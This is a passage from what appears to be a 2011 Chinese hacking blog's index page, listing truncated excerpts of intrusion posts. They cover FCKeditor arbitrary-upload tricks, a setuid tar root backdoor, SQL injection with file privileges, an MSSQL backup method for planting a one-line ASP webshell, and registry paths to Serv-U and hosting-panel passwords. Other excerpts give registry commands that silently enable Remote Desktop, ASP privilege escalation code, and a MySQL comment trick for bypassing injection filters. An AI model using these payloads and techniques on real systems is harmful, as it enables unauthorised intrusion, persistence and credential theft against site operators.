上一页 1 ··· 19 20 21 22 23 24 25 26 27 ··· 30 下一页

2011年4月15日

Fckeditor漏洞利用方法总结

摘要: 查看编辑器版本FCKeditor/_whatsnew.html—————————————————————————————————————————————————————————————2. Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破!测试通过。—————————————————————————————————————————————————————————————3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action 阅读全文

posted @ 2011-04-15 04:24 =_=! 阅读(464) 评论(0) 推荐(0) 编辑

2011年4月12日

利用设置tar的suid来获取root

摘要: 首先申明,这并不是一个linux tar漏洞,只是在获取linux root后通过tar留的一个后门,在一个正常的linux系统中tar被添加上了suid并不会太多的引人注目。整个执行过程如下host:~# useradd testhost:~# su testhost:/tmp$ tar xvpf root.tartar_root/tar_root/2tar: tar_root/2: time stamp 2010-11-11 04:04:34 is 77742.715113 s in the futuretar_root/3tar: tar_root/3: time stamp 2010- 阅读全文

posted @ 2011-04-12 18:50 =_=! 阅读(380) 评论(0) 推荐(0) 编辑

SQL注入和文件提权

摘要: 德国人写的关SQL注入和文件提权的文章[+]info:~~~~~~~~~WEBSECURITY DOCUMENTATIONSQL Injection with File Privilegeswritten by fred777 [fred777.5x.to][+]content:~~~~~~~~~–[0x00]– Intro–[0x01]– Knowledge [1] Load_File [2] Dumpfile und Outfile–[0x02]– Exploiting [1] Privilegien mit mysql.user [2] Privilegien mit informati 阅读全文

posted @ 2011-04-12 18:39 =_=! 阅读(274) 评论(0) 推荐(0) 编辑

Mssql备份得webshell突破特殊字符限制

摘要: 1.插入数据mssql注射使用Backup或makewebtask得到webshell,在写入webshell代码时,如果过滤了一些特殊字符,如" '等。我们先mssql分析器里“查询”:use pubs; <===使用数据库pubscreate table cmd (str image); <===建立个表cmd 一个属性为image的列insert into cmd (str) values ('<%execute request("cmd")&""%>') <===插入数据为 阅读全文

posted @ 2011-04-12 17:24 =_=! 阅读(248) 评论(0) 推荐(0) 编辑

渗透测试时用到的注册表键值

摘要: 平时收集的,一般服务器对注册表的读取 很少限制的,往往从注册表中能获取不少信息HKEY_LOCAL_MACHINE\SYSTEM\Control001\Services\ #获取一些服务信息HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\ #server-uHKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpassHKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpassHKEY_LOC 阅读全文

posted @ 2011-04-12 17:22 =_=! 阅读(292) 评论(0) 推荐(0) 编辑

2011年4月10日

修改组策略直接开启远程桌面

摘要: 开启windows的3389端口的讨论网上很多,大多数是通过修改Termservice服务对应注册表项实现的,而且对于xp、2003方法不同,且大多数情况需要重启。其实组策略可以直接开启远程桌面的监听端口(前提:termservice服务已经启动),只需修改注册表一个地方:reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /Freg add"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services&q 阅读全文

posted @ 2011-04-10 00:28 =_=! 阅读(301) 评论(0) 推荐(0) 编辑

2011年4月1日

谈点个人入侵网站的经验

该文被密码保护。 阅读全文

posted @ 2011-04-01 10:41 =_=! 阅读(17) 评论(0) 推荐(0) 编辑

2011年3月30日

无wscript.shell组件提权

摘要: 代码:<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if 阅读全文

posted @ 2011-03-30 22:54 =_=! 阅读(364) 评论(0) 推荐(0) 编辑

2011年3月29日

一个存在十年之久的提权技巧,将永远存在下去?

摘要: E:\>setCOMPUTERNAME=ROOTComSpec=C:\WINDOWS\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Documents and Settings\mmLOGONSERVER=\\ROOTNLS_LANG=AMERICAN_AMERICA.ZHS16GBKNUMBER_OF_PROCESSORS=2OS=Windows_NTPath=E:\Perl\site\bin;E:\Perl\bin;E:\Program Files\Metasploit\Framework3\bin;E:\Pytho 阅读全文

posted @ 2011-03-29 04:24 =_=! 阅读(358) 评论(0) 推荐(0) 编辑

/*!select*/ 突破防注入

摘要: 昨天在检测一个外国PHP网站时在id=255后加’出现forbidden于是我and 1=1正常 and 1=2出错说明肯定有注入接着我order by猜出字段然后union select 1,2,3,4 //悲剧的又出现了forbidden肯定是做了过滤了后来构造了语句id=-255+union+/*!select*/+1,2,3,4原理:MySQL Server supports some variants of C-style comments. These enable you to write code that includes MySQL extensions, but is s 阅读全文

posted @ 2011-03-29 04:18 =_=! 阅读(427) 评论(0) 推荐(0) 编辑

上一页 1 ··· 19 20 21 22 23 24 25 26 27 ··· 30 下一页

导航